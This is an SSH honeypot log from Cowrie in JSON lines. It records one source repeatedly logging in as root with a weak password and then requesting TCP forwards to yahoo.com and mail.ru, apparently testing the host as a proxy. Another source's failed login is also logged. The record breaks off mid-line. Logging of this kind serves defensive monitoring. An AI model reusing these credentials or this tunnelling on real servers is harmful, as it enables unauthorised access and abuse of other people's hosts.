{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:06.455260Z","src_ip":"77.83.207.83","session":"9780ea5d160d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":3404,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3404","sensor":"my-vps","timestamp":"2025-08-31T03:53:06.596668Z","session":"9780ea5d160d"}
{"eventid":"cowrie.login.failed","username":"master","password":"password","message":"login attempt [master/password] failed","sensor":"my-vps","timestamp":"2025-08-31T03:53:06.621146Z","src_ip":"212.227.125.160","session":"ead6d7bc14a0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:06.647020Z","src_ip":"77.83.207.83","session":"9780ea5d160d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:06.698178Z","src_ip":"77.83.207.83","session":"9780ea5d160d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38709,"dst_ip":"1.2.3.4","dst_port":22,"session":"709463335311","protocol":"ssh","message":"New connection: 77.83.207.83:38709 (1.2.3.4:22) [session: 709463335311]","sensor":"my-vps","timestamp":"2025-08-31T03:53:06.746827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:06.747513Z","src_ip":"77.83.207.83","session":"709463335311"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:06.797920Z","src_ip":"77.83.207.83","session":"709463335311"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:07.048998Z","src_ip":"77.83.207.83","session":"709463335311"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":498,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:498","sensor":"my-vps","timestamp":"2025-08-31T03:53:07.101179Z","session":"709463335311"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:07.151481Z","src_ip":"77.83.207.83","session":"709463335311"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11705,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11705","sensor":"my-vps","timestamp":"2025-08-31T03:53:07.292874Z","session":"709463335311"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:07.343243Z","src_ip":"77.83.207.83","session":"709463335311"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":9676,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:9676","sensor":"my-vps","timestamp":"2025-08-31T03:53:07.484660Z","session":"709463335311"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:07.535027Z","src_ip":"77.83.207.83","session":"709463335311"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:07.586050Z","src_ip":"77.83.207.83","session":"709463335311"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38834,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc4c51e357ca","protocol":"ssh","message":"New connection: 77.83.207.83:38834 (1.2.3.4:22) [session: dc4c51e357ca]","sensor":"my-vps","timestamp":"2025-08-31T03:53:07.636041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:07.645650Z","src_ip":"77.83.207.83","session":"dc4c51e357ca"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:07.686545Z","src_ip":"77.83.207.83","session":"dc4c51e357ca"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:07.937840Z","src_ip":"77.83.207.83","session":"dc4c51e357ca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28059,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:28059","sensor":"my-vps","timestamp":"2025-08-31T03:53:07.989238Z","session":"dc4c51e357ca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:08.039687Z","src_ip":"77.83.207.83","session":"dc4c51e357ca"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:08.047114Z","src_ip":"212.227.125.160","session":"ead6d7bc14a0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":12457,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:12457","sensor":"my-vps","timestamp":"2025-08-31T03:53:08.180902Z","session":"dc4c51e357ca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:08.232240Z","src_ip":"77.83.207.83","session":"dc4c51e357ca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":1997,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:1997","sensor":"my-vps","timestamp":"2025-08-31T03:53:08.377496Z","session":"dc4c51e357ca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:08.428073Z","src_ip":"77.83.207.83","session":"dc4c51e357ca"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:08.479773Z","src_ip":"77.83.207.83","session":"dc4c51e357ca"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38944,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc550f6608a7","protocol":"ssh","message":"New connection: 77.83.207.83:38944 (1.2.3.4:22) [session: fc550f6608a7]","sensor":"my-vps","timestamp":"2025-08-31T03:53:08.529162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:08.539420Z","src_ip":"77.83.207.83","session":"fc550f6608a7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:08.579471Z","src_ip":"77.83.207.83","session":"fc550f6608a7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:08.829681Z","src_ip":"77.83.207.83","session":"fc550f6608a7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3434,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3434","sensor":"my-vps","timestamp":"2025-08-31T03:53:08.881050Z","session":"fc550f6608a7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:08.931419Z","src_ip":"77.83.207.83","session":"fc550f6608a7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":24678,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:24678","sensor":"my-vps","timestamp":"2025-08-31T03:53:09.072632Z","session":"fc550f6608a7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:09.122906Z","src_ip":"77.83.207.83","session":"fc550f6608a7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":29677,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:29677","sensor":"my-vps","timestamp":"2025-08-31T03:53:09.264539Z","session":"fc550f6608a7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:09.314828Z","src_ip":"77.83.207.83","session":"fc550f6608a7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:09.366026Z","src_ip":"77.83.207.83","session":"fc550f6608a7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39015,"dst_ip":"1.2.3.4","dst_port":22,"session":"184637d33715","protocol":"ssh","message":"New connection: 77.83.207.83:39015 (1.2.3.4:22) [session: 184637d33715]","sensor":"my-vps","timestamp":"2025-08-31T03:53:09.414152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:09.414972Z","src_ip":"77.83.207.83","session":"184637d33715"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:09.464960Z","src_ip":"77.83.207.83","session":"184637d33715"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:09.712751Z","src_ip":"77.83.207.83","session":"184637d33715"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14918,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:14918","sensor":"my-vps","timestamp":"2025-08-31T03:53:09.763470Z","session":"184637d33715"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:09.813344Z","src_ip":"77.83.207.83","session":"184637d33715"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":27453,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:27453","sensor":"my-vps","timestamp":"2025-08-31T03:53:09.955971Z","session":"184637d33715"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:10.005935Z","src_ip":"77.83.207.83","session":"184637d33715"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":27375,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:27375","sensor":"my-vps","timestamp":"2025-08-31T03:53:10.148036Z","session":"184637d33715"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:10.197959Z","src_ip":"77.83.207.83","session":"184637d33715"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:10.248577Z","src_ip":"77.83.207.83","session":"184637d33715"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39109,"dst_ip":"1.2.3.4","dst_port":22,"session":"36656cb087ac","protocol":"ssh","message":"New connection: 77.83.207.83:39109 (1.2.3.4:22) [session: 36656cb087ac]","sensor":"my-vps","timestamp":"2025-08-31T03:53:10.297791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:10.298452Z","src_ip":"77.83.207.83","session":"36656cb087ac"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 